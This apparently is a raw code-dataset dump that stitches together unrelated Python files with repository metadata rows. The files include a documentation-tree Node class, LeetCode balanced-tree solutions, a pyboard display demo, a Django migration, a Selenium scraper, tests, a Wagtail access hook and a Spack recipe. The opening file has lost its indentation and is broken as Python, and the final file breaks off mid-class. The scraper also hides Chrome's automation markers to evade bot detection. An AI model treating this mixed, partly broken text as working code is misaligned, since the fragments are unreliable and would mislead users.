def __init__(self, type, name="", file="", line_number=0, documentation=[]):
global genericUID
genericUID+=1
self.uid = genericUID
self.documenatation_code = []
self.node_type = type
self.name = name
self.doc = None
self.file_name = file
self.line_number = line_number
self.sub_list = None
self.access = None
# namespace elements : (set when all element are parsed ...
self.namespace = []
self.module_link = None # this is a link on the main application node or library node (usefull to get the website ...)
self.hidden_request = False # @not-in-doc
self.previous_request = False # @previous
self.template = []
self.add_doc(documentation)
def to_str(self):
return ""
def str(self):
return self.to_str()
def get_node_type(self):
return self.node_type
def get_name(self):
ret = ""
if self.template != []:
ret += "template<"
first = True
for elem in self.template:
if first == True:
first = False
else:
ret += ", "
if len(elem) >= 2:
ret += elem[1]
else:
ret += elem[0]
ret += "> "
ret += self.name
return ret
def get_UID(self):
return self.uid
def add_doc(self, doc):
for element in doc:
self.documenatation_code.append(element)
if element.find("@not-in-doc") != -1 :
self.hidden_request = True
if element.find("@previous") != -1 :
self.previous_request = True
def get_request_hidden(self):
return self.hidden_request
def get_request_in_previous(self):
return self.previous_request
def get_displayable_name(self):
ret = ""
for namespace in self.namespace:
ret += namespace + "::"
ret += self.name
return ret
def get_uid(self):
return self.uid
def get_doc(self):
#debug.info(str(self.doc))
if len(self.documenatation_code) > 0:
ret = ""
isFirst = True
for req in self.documenatation_code:
if isFirst == False:
ret += '\n'
isFirst = False
ret += req
return ret
if self.node_type not in ['methode']:
return ""
#try to get previous element :
if len(self.namespace) == 0:
return ""
parent = ""
isFirst = True
for namesapace in self.namespace:
if isFirst == False:
parent += "::"
isFirst = False
parent += namesapace
element = module.get_element_with_name(parent)
if element == None:
return ""
if element.get_node_type() != 'class':
return ""
parents = element.get_parents()
if len(parents) == 0:
return ""
for myParent in reversed(parents):
element = module.get_element_with_name(myParent[0]['class'])
if element == None:
continue
heveMethode, pointerMethode = element.have_methode(self.name)
if heveMethode == False:
continue
if len(pointerMethode.documenatation_code) != 0:
return pointerMethode.get_doc()
return ""
def get_lib_name(self):
if self.module_link == None:
return None
return self.module_link.get_base_doc_node().get_name()
def debug_display(self, level=0, access = None):
if access == 'private':
debug.info(debug_space(level) + "- " + self.node_type + " => " + self.name)
elif access == 'protected':
debug.info(debug_space(level) + "# " + self.node_type + " => " + self.name)
elif access == 'public':
debug.info(debug_space(level) + "+ " + self.node_type + " => " + self.name)
else:
debug.info(debug_space(level) + self.node_type + " => " + self.name)
if self.sub_list!= None:
for element in self.sub_list:
if 'access' in element.keys():
element['node'].debug_display(level+1, element['access'])
else:
element['node'].debug_display(level+1)
def set_access(self, access):
if access not in access_list:
debug.warning("This is not a valid access : '" + access + "' : availlable : " + str(access_list))
return
if self.access == None:
debug.error("This Node does not support acces configuration...")
return
self.access = access
def get_access(self):
return self.access
def append(self, newSubElement):
# just add it in a sub List :
if self.sub_list == None:
debug.error("can not add a '" + newSubElement.node_type + "' at this '" + self.node_type + "'")
return
if newSubElement.get_node_type() != 'namespace':
if self.access == None:
self.sub_list.append({'node' : newSubElement})
else:
self.sub_list.append({'access' : self.access, 'node' : newSubElement})
return
# check if the element already exist
for element in self.sub_list:
if element['node'].get_node_type() == 'namespace':
if element['node'].get_name() == newSubElement.get_name():
debug.verbose("fusionate with previous declaration")
element['node'].fusion(newSubElement)
return
# normal case adding :
if self.access == None:
self.sub_list.append({'node' : newSubElement})
else:
self.sub_list.append({'access' : self.access, 'node' : newSubElement})
##
## @ brief only for namespace :
##
##
def fusion(self, addedElement):
for element in addedElement.sub_list:
self.append(element['node'])
##
## @brief Get the list of all specify type
## @param[in] type Type requested ['namespace', 'class', 'struct', 'methode', 'enum', 'define', 'union', 'variable', 'constructor', 'destructor'] (can be a list)
## @param[in] sorted Request to sort the return list.
## @return The requested list or []
##
def get_all_sub_type(self, type='all', sorted = False):
if type == 'all':
return self.sub_list
if isinstance(type, list) == False:
type = [type]
if self.sub_list == None:
return []
ret = []
for element in self.sub_list:
if element['node'].get_node_type() in type:
ret.append(element)
if sorted == True:
# TODO : Sorted the list ...
pass
return ret
def get_doc_website_page(self):
if self.module_link == None:
return ""
ret = self.module_link.get_website()
if ret[-1] != '/':
ret += '/'
ret += self.get_node_type()
ret += "_"
for name in self.namespace:
ret += name + "__"
if self.name == "":
ret += "NO_NAME_" + str(self.uid)
else:
ret += self.name
ret += '.html'
return ret
def get_doc_website_page_local(self):
ret = self.get_node_type()
ret += "_"
for name in self.namespace:
ret += name + "__"
if self.name == "":
ret += "NO_NAME_" + str(self.uid)
else:
ret += self.name
if self.template != []:
ret += "__template_"
first = True
for elem in self.template:
if first == True:
first = False
else:
ret += "_"
if len(elem) >= 2:
ret += elem[1]
else:
ret += elem[0]
ret += "__"
ret += '.html'
return ret
def set_module_link(self, module):
self.module_link = module
# set for all sub elements ...
if self.sub_list == None:
return
if self.node_type in ['class', 'namespace', 'struct']:
for element in self.sub_list:
element['node'].set_module_link(module)
elif self.node_type in ['library', 'application']:
for element in self.sub_list:
element['node'].set_module_link(module)
def set_namespace(self, hierarchy = []):
#debug.info('set namespace : ' + self.name + ' : ' + str(hierarchy))
# store namespaces:
for tmpName in hierarchy:
self.namespace.append(tmpName)
# set for all sub elements ...
if self.sub_list == None:
return
if self.node_type in ['class', 'namespace', 'struct']:
for element in self.sub_list:
hierarchy.append(self.name)
element['node'].set_namespace(hierarchy)
#debug.info(" ==> " + str(element['node'].get_namespace()))
hierarchy.pop()
elif self.node_type in ['library', 'application']:
for element in self.sub_list:
element['node'].set_namespace()
#debug.info(" ==> " + str(element['node'].get_namespace()))
	##
	## @brief Get the namespace hierarchy this element lives in.
	## @return List of namespace names (outermost first).
	##
	def get_namespace(self):
		return self.namespace
	##
	## @brief Debug helper: recursively log "<namespace list> : <name>" for
	## this element and every sub-element.
	##
	def complete_display(self):
		debug.info(str(self.namespace) + ' : ' + self.name)
		if self.sub_list == None:
			return
		for element in self.sub_list:
			element['node'].complete_display()
	##
	## @brief Find the element designated by a qualified name path.
	## @param[in] list Name path, outermost first (e.g. ['ns', 'Class', 'method']).
	##            (note: this parameter shadows the builtin 'list')
	## @return The matching element, or None when not found.
	##
	def find(self, list):
		debug.verbose("find : " + str(list) + " in " + self.node_type + "(" + self.name + ")")
		if len(list) == 0:
			return None
		# libraries/applications are transparent containers: search children
		# without consuming a path component
		if self.node_type in ['library', 'application']:
			if self.sub_list == None:
				return None
			for element in self.sub_list:
				ret = element['node'].find(list)
				if ret != None:
					return ret
			return None
		# the first remaining path component must match this element's name
		if list[0] != self.name:
			return None
		tmpList = list[1:]
		if len(tmpList) == 0:
			return self
		elif self.node_type not in ['class', 'namespace', 'struct']:
			# have other sub element and other elemetn than upper can have sub element ...
			return None
		if self.sub_list == None:
			return None
		for element in self.sub_list:
			ret = element['node'].find(tmpList)
			if ret != None:
				return ret
		return None
	##
	## @brief Collect sub-elements related to a given parent name.
	## @param[in] parrentName Name of the parent element to look for.
	## @return List of matching elements (possibly []).
	##
	## NOTE(review): this base implementation only recurses and never compares
	## anything against parrentName itself -- the actual matching presumably
	## happens in an overriding subclass; confirm before relying on it.
	##
	def get_whith_specific_parrent(self, parrentName):
		ret = []
		# set for all sub elements ...
		if self.sub_list != None:
			for element in self.sub_list:
				tmpRet = element['node'].get_whith_specific_parrent(parrentName)
				if len(tmpRet) != 0:
					for tmp in tmpRet:
						ret.append(tmp)
		return ret
def have_methode(self, methodeName):
if self.sub_list != None:
for element in self.sub_list:
if element['node'].get_node_type() != 'methode':
continue
if element['access'] == "private":
continue
if element['node'].get_virtual() == False:
continue
if element['node'].get_name() == methodeName:
return [True, element['node']]
return [False, None]
##
## @brief Root element of a parsed tree: a whole library or application.
##
class MainNode(Node):
	def __init__(self, type="library", name=""):
		Node.__init__(self, type, name)
		# a main node always owns a (possibly empty) list of children
		self.sub_list = []
##
## @brief Express 'dest' relative to the folder that contains 'base'.
## @param[in] base Reference page path (e.g. "aaa/bbb/ccc.html").
## @param[in] dest Target page path.
## @return 'dest' stripped of base's folder, '../...' when only the parent
##         folder is shared, or 'dest' unchanged otherwise.
##
def get_doc_website_page_relative(base, dest):
	last_slash = base.rfind('/')
	if last_slash == -1:
		real_base = ""
		last_folder = ""
	else:
		# real_base: everything up to (and including) the last '/'
		real_base = base[:last_slash + 1]
		# last_folder: the final folder component, '/' included
		prev_slash = base.rfind('/', 0, last_slash)
		last_folder = base[prev_slash + 1:last_slash + 1]
	# same folder ==> simply strip the common prefix
	if dest[:len(real_base)] == real_base:
		return dest[len(real_base):]
	# same parent folder ==> go one level up
	parent = real_base[:len(real_base) - len(last_folder)]
	if dest[:len(parent)] == parent:
		return '../' + dest[len(parent):]
	return dest
| 9,022 | -8 | 809 |
61c6228d07263ba5b340f2078725ac7dc107668c | 1,802 | py | Python | src/110.BalancedBinaryTree/110.py | Taowyoo/LeetCodeLog | cb05798538dd10675bf81011a419d0e33d85e4e0 | [
"MIT"
] | null | null | null | src/110.BalancedBinaryTree/110.py | Taowyoo/LeetCodeLog | cb05798538dd10675bf81011a419d0e33d85e4e0 | [
"MIT"
] | null | null | null | src/110.BalancedBinaryTree/110.py | Taowyoo/LeetCodeLog | cb05798538dd10675bf81011a419d0e33d85e4e0 | [
"MIT"
] | null | null | null | '''
File: 110.py
File Created: 2021-01-12 13:48:32 -08:00
Author: Taowyoo (caoyxsh@outlook.com)
Brief: https://leetcode.com/problems/balanced-binary-tree/
-----
Last Modified: 2021-01-12 13:48:41 -08:00
Modified By: Taowyoo (caoyxsh@outlook.com>)
-----
Copyright 2020 - 2021
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
"""Recursive Solution
"""
class Solution(object):
"""Itrative Solution
Args:
object ([type]): [description]
""" | 28.603175 | 86 | 0.498335 | '''
File: 110.py
File Created: 2021-01-12 13:48:32 -08:00
Author: Taowyoo (caoyxsh@outlook.com)
Brief: https://leetcode.com/problems/balanced-binary-tree/
-----
Last Modified: 2021-01-12 13:48:41 -08:00
Modified By: Taowyoo (caoyxsh@outlook.com>)
-----
Copyright 2020 - 2021
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution:
    """Recursive (bottom-up) solution.

    check(node) returns the height of the subtree rooted at node, or -1 as
    soon as any subtree is found to be unbalanced, so the recursion
    short-circuits without visiting the rest of the tree.
    """
    def isBalanced(self, root):
        def check(root):
            # height of an empty subtree is 0
            if root is None:
                return 0
            left = check(root.left)
            if left == -1:
                return -1
            right = check(root.right)
            # if imbalanced return -1
            if right == -1 or abs(left - right) > 1:
                return -1
            return 1 + max(left, right) # return current node height
        return check(root) != -1
class Solution(object):
    """Iterative solution.

    Post-order traversal with an explicit stack; `depths` memoizes the
    height of every fully processed node, and `last` remembers the node
    visited just before, so we can tell when a right subtree is finished.
    """
    def isBalanced(self, root):
        stack, node, last, depths = [], root, None, {}
        while stack or node:
            if node:
                # walk down the left spine
                stack.append(node)
                node = node.left
            else:
                node = stack[-1]
                if not node.right or last == node.right:
                    # right subtree done (or absent): process this node
                    node = stack.pop()
                    left, right = depths.get(node.left, 0), depths.get(node.right, 0)
                    if abs(left - right) > 1: return False
                    depths[node] = 1 + max(left, right)
                    last = node
                    node = None
                else:
                    node = node.right
        return True
855b5b5f58d42b9a856daaad9651e9f5bff5e131 | 486 | py | Python | examples/Boards/pyboard/Display/ssd1306Demo.py | myhumankit/ESP32_IDE_accessible | 5262a5dd106f3f52a374a6c1ef68ff53d8847001 | [
"MIT"
] | 1 | 2020-07-27T19:32:56.000Z | 2020-07-27T19:32:56.000Z | examples/Boards/pyboard/Display/ssd1306Demo.py | myhumankit/Blind_IDE | 5262a5dd106f3f52a374a6c1ef68ff53d8847001 | [
"MIT"
] | null | null | null | examples/Boards/pyboard/Display/ssd1306Demo.py | myhumankit/Blind_IDE | 5262a5dd106f3f52a374a6c1ef68ff53d8847001 | [
"MIT"
] | null | null | null | #hardware platform: pyboard V1.1
import pyb
import ssd1306
i2c=pyb.I2C(1,pyb.I2C.MASTER,baudrate=100000) #Init i2c
lcd=ssd1306.SSD1306_I2C(128,64,i2c) #create LCD object,Specify width and height
lcd.text("DFRobot",0,0) #set "DFRobot" at (0,0)
lcd.text("chengdu",24,16) #set "chengdu" at (24,16)
lcd.text("123456",64,24) #set "123456" at (64,24)
lcd.show() #display | 44.181818 | 91 | 0.547325 | #hardware platform: pyboard V1.1
import pyb
import ssd1306
i2c=pyb.I2C(1,pyb.I2C.MASTER,baudrate=100000) #Init i2c
lcd=ssd1306.SSD1306_I2C(128,64,i2c) #create LCD object,Specify width and height
lcd.text("DFRobot",0,0) #set "DFRobot" at (0,0)
lcd.text("chengdu",24,16) #set "chengdu" at (24,16)
lcd.text("123456",64,24) #set "123456" at (64,24)
lcd.show() #display | 0 | 0 | 0 |
be1fe1edfef0a5b0c9144e72f09f8b6e5ed105d5 | 35 | py | Python | scripts/portal/back_Ludi.py | pantskun/swordiemen | fc33ffec168e6611587fdc75de8270f6827a4176 | [
"MIT"
] | null | null | null | scripts/portal/back_Ludi.py | pantskun/swordiemen | fc33ffec168e6611587fdc75de8270f6827a4176 | [
"MIT"
] | null | null | null | scripts/portal/back_Ludi.py | pantskun/swordiemen | fc33ffec168e6611587fdc75de8270f6827a4176 | [
"MIT"
] | null | null | null | # 223000000
sm.warp(220000000, 26)
| 11.666667 | 22 | 0.742857 | # 223000000
sm.warp(220000000, 26)
| 0 | 0 | 0 |
20c273b1cbd7836ca08eb5b6aa9404af047b5767 | 816 | py | Python | backend/users/migrations/0003_auto_20210710_2236.py | Swannbm/django3-vue2 | 22bc7cc156e89d40e63f1edd5419547177903ebf | [
"CC0-1.0"
] | null | null | null | backend/users/migrations/0003_auto_20210710_2236.py | Swannbm/django3-vue2 | 22bc7cc156e89d40e63f1edd5419547177903ebf | [
"CC0-1.0"
] | 3 | 2022-02-10T11:47:58.000Z | 2022-02-23T18:50:24.000Z | backend/users/migrations/0003_auto_20210710_2236.py | Swannbm/django3-vue2 | 22bc7cc156e89d40e63f1edd5419547177903ebf | [
"CC0-1.0"
] | null | null | null | # Generated by Django 3.2.5 on 2021-07-10 22:36
from django.db import migrations, models
import django.utils.timezone
| 25.5 | 67 | 0.555147 | # Generated by Django 3.2.5 on 2021-07-10 22:36
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
("users", "0002_auto_20210706_2214"),
]
operations = [
migrations.AddField(
model_name="user",
name="creation_date",
field=models.DateTimeField(
auto_now_add=True,
default=django.utils.timezone.now,
verbose_name="creation date",
),
preserve_default=False,
),
migrations.AddField(
model_name="user",
name="email_checked",
field=models.DateTimeField(
blank=True, null=True, verbose_name="email checked"
),
),
]
| 0 | 673 | 23 |
0ed74bd87270d561a4ec564b6ffdc46f62221f3f | 2,155 | py | Python | cu_parser.py | clownkill/CU_bot | 08a42afa7110fc15df35838e1dcaab032b230631 | [
"MIT"
] | null | null | null | cu_parser.py | clownkill/CU_bot | 08a42afa7110fc15df35838e1dcaab032b230631 | [
"MIT"
] | null | null | null | cu_parser.py | clownkill/CU_bot | 08a42afa7110fc15df35838e1dcaab032b230631 | [
"MIT"
] | null | null | null | from selenium.webdriver import Chrome
from selenium.webdriver import ChromeOptions
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
if __name__ == '__main__':
main()
| 34.758065 | 137 | 0.722042 | from selenium.webdriver import Chrome
from selenium.webdriver import ChromeOptions
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By
from webdriver_manager.chrome import ChromeDriverManager
def get_card_links(driver, end_page):
    """Collect the product-page URL of every graphics card on pages 1..end_page.

    Args:
        driver: Selenium WebDriver instance.
        end_page: last catalogue page number to scrape (inclusive).
    Returns:
        List of href strings.
    """
    card_links = []
    for page in range(1, end_page+1):
        url = f'https://www.computeruniverse.net/en/c/hardware-components/pci-express-graphics-cards?page={page}'
        driver.get(url)
        # each product is a 'c-productItem' inside the main rows container
        g_cards = driver.find_element(
            by=By.CLASS_NAME, value='c-pl__main--rows'
        ).find_elements(by=By.CLASS_NAME, value='c-productItem')
        # card_links = [card.find_element(by=By.CLASS_NAME, value='c-productItem__head__name').get_attribute('href') for card in g_cards]
        for g_card in g_cards:
            card_links.append(g_card.find_element(by=By.CLASS_NAME, value='c-productItem__head__name').get_attribute('href'))
    return card_links
def get_end_page(driver):
    """Return the highest page number shown in the catalogue pagination.

    NOTE(review): implicitly returns None when no numeric pagination button
    exists -- a caller doing range(1, end_page + 1) would then fail; confirm.
    """
    url = 'https://www.computeruniverse.net/en/c/hardware-components/pci-express-graphics-cards'
    driver.get(url)
    paginations = driver.find_elements(by=By.CLASS_NAME, value='Pagination__naviButton__inner')
    # walk backwards: the last numeric button is the highest page number
    for a_elem in paginations[::-1]:
        if a_elem.text.isnumeric():
            return int(a_elem.text)
def parse_card_page(driver, url):
    """Open one product page and print the text of its price box.

    Args:
        driver: Selenium WebDriver instance.
        url: absolute product page URL.
    """
    driver.get(url)
    price_div = driver.find_element(by=By.CLASS_NAME, value='price-box')
    # BUG FIX: find_elements() returns a list, which has no `.text`
    # attribute (the old code raised AttributeError); gather the text of
    # every <span> inside the price box instead, and print the price
    # rather than the WebElement object.
    spans = price_div.find_elements(by=By.TAG_NAME, value='span')
    price = ' '.join(span.text for span in spans)
    print(price)
def main():
    """Entry point: start a Chrome driver with automation markers hidden and
    parse a single hard-coded product page."""
    options = ChromeOptions()
    # hide the usual Selenium fingerprints from the site
    options.add_experimental_option("excludeSwitches", ["enable-automation"])
    options.add_experimental_option('useAutomationExtension', False)
    options.add_argument("--disable-blink-features=AutomationControlled")
    driver = Chrome(service=Service(ChromeDriverManager().install()), options=options)
    # end_page = get_end_page(driver)
    # card_links = get_card_links(driver, end_page)
    # for card in card_links:
    #     print(card)
    url = 'https://www.computeruniverse.net/en/p/90836256'
    parse_card_page(driver, url)
if __name__ == '__main__':
main()
| 1,781 | 0 | 92 |
4d2ece47a2b1be41bd4a7f580594280353211d45 | 2,403 | py | Python | to-send-a-fax/to_send_a_fax_test.py | simonbates/collected | fd4cbaaf75ca25688983f39d51a02b42a86b3e5a | [
"MIT"
] | 1 | 2019-11-11T12:54:54.000Z | 2019-11-11T12:54:54.000Z | to-send-a-fax/to_send_a_fax_test.py | simonbates/collected | fd4cbaaf75ca25688983f39d51a02b42a86b3e5a | [
"MIT"
] | null | null | null | to-send-a-fax/to_send_a_fax_test.py | simonbates/collected | fd4cbaaf75ca25688983f39d51a02b42a86b3e5a | [
"MIT"
] | null | null | null | from to_send_a_fax import E, f
import unittest
if __name__ == '__main__':
unittest.main()
| 36.969231 | 72 | 0.55181 | from to_send_a_fax import E, f
import unittest
class ToSendAFaxTest(unittest.TestCase):
    """Tests for the Project Euler 'number letter counts' helpers.

    E(x) is the number of letters in the English spelling of x (spaces and
    hyphens not counted); f(x) = 3*[E(x)]^3 - x.
    """
    def test_E(self):
        """Letter counts for units, teens, tens, hundreds and thousands."""
        self.assertEqual(4, E(0)) # zero
        self.assertEqual(3, E(1)) # one
        self.assertEqual(3, E(2)) # two
        self.assertEqual(5, E(3)) # three
        self.assertEqual(4, E(4)) # four
        self.assertEqual(4, E(5)) # five
        self.assertEqual(3, E(6)) # six
        self.assertEqual(5, E(7)) # seven
        self.assertEqual(5, E(8)) # eight
        self.assertEqual(4, E(9)) # nine
        self.assertEqual(3, E(10)) # ten
        self.assertEqual(6, E(11)) # eleven
        self.assertEqual(6, E(12)) # twelve
        self.assertEqual(8, E(13)) # thirteen
        self.assertEqual(8, E(14)) # fourteen
        self.assertEqual(7, E(15)) # fifteen
        self.assertEqual(7, E(16)) # sixteen
        self.assertEqual(9, E(17)) # seventeen
        self.assertEqual(8, E(18)) # eighteen
        self.assertEqual(8, E(19)) # nineteen
        self.assertEqual(6, E(20)) # twenty
        self.assertEqual(9, E(21)) # twentyone
        self.assertEqual(6, E(30)) # thirty
        self.assertEqual(5, E(40)) # forty
        self.assertEqual(5, E(50)) # fifty
        self.assertEqual(5, E(60)) # sixty
        self.assertEqual(7, E(70)) # seventy
        self.assertEqual(6, E(80)) # eighty
        self.assertEqual(6, E(90)) # ninety
        self.assertEqual(10, E(99)) # ninetynine
        self.assertEqual(10, E(100)) # one hundred
        self.assertEqual(13, E(101)) # one hundred one
        self.assertEqual(21, E(123)) # one hundred twenty three
        self.assertEqual(21, E(999)) # nine hundred ninety nine
        # one hundred twenty three thousand four hundred fifty six
        self.assertEqual(48, E(123456))
        # nine hundred ninety nine thousand nine hundred ninety nine
        self.assertEqual(50, E(999999))
        # minus one hundred twenty three thousand four hundred fifty six
        self.assertEqual(53, E(-123456))
    def test_f(self):
        """f combines the letter count with the value itself."""
        # f(x) = 3[E(x)]^3-x
        # f(0) = 3[E(0)]^3
        #      = 3[4]^3
        #      = 192
        self.assertEqual(192, f(0))
        # f(-123) = 3[E(-123)]^3 + 123
        #         = 3[26]^3 + 123
        #         = 52851
        self.assertEqual(52851, f(-123))
if __name__ == '__main__':
unittest.main()
| 2,213 | 19 | 76 |
0b08850de7be3cabf3317ff12b029901307cb804 | 1,135 | py | Python | responses_parser/response_utils.py | ScriptHound/vk_schema_codegen | 174563adcf2d33f31820addf1f2e4193e40cc03f | [
"MIT"
] | 9 | 2021-01-24T19:25:45.000Z | 2021-05-27T16:51:11.000Z | responses_parser/response_utils.py | ScriptHound/vk_schema_codegen | 174563adcf2d33f31820addf1f2e4193e40cc03f | [
"MIT"
] | 1 | 2021-03-14T14:37:10.000Z | 2021-03-14T14:37:10.000Z | responses_parser/response_utils.py | ScriptHound/vk_schema_codegen | 174563adcf2d33f31820addf1f2e4193e40cc03f | [
"MIT"
] | 1 | 2021-02-08T14:06:29.000Z | 2021-02-08T14:06:29.000Z | import json
from utils.os_utils import create_python_files, create_results_dir
from utils.strings_util import snake_case_to_camel_case
| 34.393939 | 76 | 0.729515 | import json
from utils.os_utils import create_python_files, create_results_dir
from utils.strings_util import snake_case_to_camel_case
def get_responses_titles(json_schema) -> list:
    """Return the name of every response definition in the schema."""
    return list(json_schema["definitions"])
def split_responses_names(json_titles: list) -> list:
    """Return the unique leading (pre-underscore) token of each title.

    Note: the result order is unspecified (it comes from a set).
    """
    prefixes = set()
    for title in json_titles:
        prefixes.add(title.split("_")[0])
    return list(prefixes)
def generate_response_dir(schema_path: str, destination_path: str) -> tuple:
    """Create the responses package skeleton from a JSON schema.

    Reads the schema, derives one python file name per response group and
    creates an empty .py file for each inside *destination_path*.

    Returns:
        (filenames, json_dict) -- note: the previous ``-> None`` annotation
        was wrong; callers rely on this tuple.
    """
    create_results_dir(destination_path)
    with open(schema_path, "r") as schema:
        json_dict = json.load(schema)
    titles = get_responses_titles(json_dict)
    filenames = split_responses_names(titles)
    create_python_files(destination_path, filenames)
    return filenames, json_dict
def put_responses_by_filename(definitions: dict, categorized: dict) -> dict:
    """Sort every response definition into its per-file bucket.

    The part of the key before the first underscore selects the bucket in
    *categorized*; the rest becomes the CamelCase class name.
    Mutates and returns *categorized*.
    """
    for full_name, definition in definitions.items():
        file_key, _, remainder = full_name.partition("_")
        class_name = snake_case_to_camel_case(remainder)
        categorized[file_key].update({class_name: definition})
    return categorized
| 903 | 0 | 92 |
67065dc0824fb854b2b7a7e019e82ceb63c779c4 | 2,404 | py | Python | wagtail/wagtailcore/wagtail_hooks.py | chrxr/wagtail | 9038da9fcd69f0b39121cc54a72f4a6ae6beb06a | [
"BSD-3-Clause"
] | 1 | 2016-12-28T11:51:15.000Z | 2016-12-28T11:51:15.000Z | wagtail/wagtailcore/wagtail_hooks.py | chrxr/wagtail | 9038da9fcd69f0b39121cc54a72f4a6ae6beb06a | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/wagtail_hooks.py | chrxr/wagtail | 9038da9fcd69f0b39121cc54a72f4a6ae6beb06a | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.contrib.auth.views import redirect_to_login
from django.core.urlresolvers import reverse
from wagtail.utils.compat import user_is_authenticated
from wagtail.wagtailcore import hooks
from wagtail.wagtailcore.models import PageViewRestriction
@hooks.register('before_serve_page')
def check_view_restrictions(page, request, serve_args, serve_kwargs):
"""
Check whether there are any view restrictions on this page which are
not fulfilled by the given request object. If there are, return an
HttpResponse that will notify the user of that restriction (and possibly
include a password / login form that will allow them to proceed). If
there are no such restrictions, return None
"""
restrictions = page.get_view_restrictions()
if restrictions:
passed_restrictions = request.session.get('passed_page_view_restrictions', [])
for restriction in restrictions:
if restriction.restriction_type == PageViewRestriction.PASSWORD:
if restriction.id not in passed_restrictions:
from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
form = PasswordPageViewRestrictionForm(instance=restriction,
initial={'return_url': request.get_full_path()})
action_url = reverse('wagtailcore_authenticate_with_password', args=[restriction.id, page.id])
return page.serve_password_required_response(request, form, action_url)
elif restriction.restriction_type == PageViewRestriction.LOGIN:
if not user_is_authenticated(request.user):
return require_wagtail_login(next=request.get_full_path())
elif restriction.restriction_type == PageViewRestriction.GROUPS:
if not request.user.is_superuser:
current_user_groups = request.user.groups.all()
if not any(group in current_user_groups for group in restriction.groups.all()):
return require_wagtail_login(next=request.get_full_path())
| 51.148936 | 114 | 0.709235 | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.contrib.auth.views import redirect_to_login
from django.core.urlresolvers import reverse
from wagtail.utils.compat import user_is_authenticated
from wagtail.wagtailcore import hooks
from wagtail.wagtailcore.models import PageViewRestriction
def require_wagtail_login(next):
    """Redirect to the Wagtail front-end login page, returning to `next` after login.

    Uses WAGTAIL_FRONTEND_LOGIN_URL when configured, otherwise the built-in
    'wagtailcore_login' view.
    """
    login_url = getattr(settings, 'WAGTAIL_FRONTEND_LOGIN_URL', reverse('wagtailcore_login'))
    return redirect_to_login(next, login_url)
@hooks.register('before_serve_page')
def check_view_restrictions(page, request, serve_args, serve_kwargs):
    """
    Check whether there are any view restrictions on this page which are
    not fulfilled by the given request object. If there are, return an
    HttpResponse that will notify the user of that restriction (and possibly
    include a password / login form that will allow them to proceed). If
    there are no such restrictions, return None
    """
    restrictions = page.get_view_restrictions()
    if restrictions:
        # ids of password restrictions already satisfied in this session
        passed_restrictions = request.session.get('passed_page_view_restrictions', [])
        for restriction in restrictions:
            if restriction.restriction_type == PageViewRestriction.PASSWORD:
                # shared-password restriction: serve the password form unless
                # it was already passed in this session
                if restriction.id not in passed_restrictions:
                    from wagtail.wagtailcore.forms import PasswordPageViewRestrictionForm
                    form = PasswordPageViewRestrictionForm(instance=restriction,
                                                           initial={'return_url': request.get_full_path()})
                    action_url = reverse('wagtailcore_authenticate_with_password', args=[restriction.id, page.id])
                    return page.serve_password_required_response(request, form, action_url)
            elif restriction.restriction_type == PageViewRestriction.LOGIN:
                # any authenticated user may view
                if not user_is_authenticated(request.user):
                    return require_wagtail_login(next=request.get_full_path())
            elif restriction.restriction_type == PageViewRestriction.GROUPS:
                # only superusers or members of one of the allowed groups
                if not request.user.is_superuser:
                    current_user_groups = request.user.groups.all()
                    if not any(group in current_user_groups for group in restriction.groups.all()):
                        return require_wagtail_login(next=request.get_full_path())
| 151 | 0 | 23 |
ed6e516c8aaad603f5a38fb41ff6e59415eebdc7 | 2,013 | py | Python | var/spack/repos/builtin/packages/vecgeom/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | null | null | null | var/spack/repos/builtin/packages/vecgeom/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2018-07-06T19:11:46.000Z | 2018-07-06T19:12:28.000Z | var/spack/repos/builtin/packages/vecgeom/package.py | xiki-tempula/spack | 9d66c05e93ab8a933fc59915040c0e0c86a4aac4 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-03-06T11:04:37.000Z | 2020-03-06T11:04:37.000Z | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import platform
class Vecgeom(CMakePackage):
"""The vectorized geometry library for particle-detector simulation
(toolkits)."""
homepage = "https://gitlab.cern.ch/VecGeom/VecGeom"
url = "https://gitlab.cern.ch/api/v4/projects/VecGeom%2FVecGeom/repository/archive.tar.gz?sha=v0.3.rc"
version('01.01.03', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.01.03', preferred=True)
version('01.00.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v01.00.00')
version('00.05.00', git='https://gitlab.cern.ch/VecGeom/VecGeom.git', tag='v00.05.00')
version('0.3.rc', sha256='a87a9ea4ab126b59ff9c79182bc0911ead3d76dd197194742e2a35ccd341299d')
variant('cxxstd',
default='17',
values=('11', '14', '17'),
multi=False,
description='Use the specified C++ standard when building.')
variant('vector',
default='native',
values=('sse3', 'sse4.2', 'native'),
multi=False,
description='Specify the instruction set for vectorization.')
depends_on('cmake@3.5:', type='build')
| 37.277778 | 106 | 0.610035 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import platform
class Vecgeom(CMakePackage):
    """The vectorized geometry library for particle-detector simulation
    (toolkits)."""
    homepage = "https://gitlab.cern.ch/VecGeom/VecGeom"
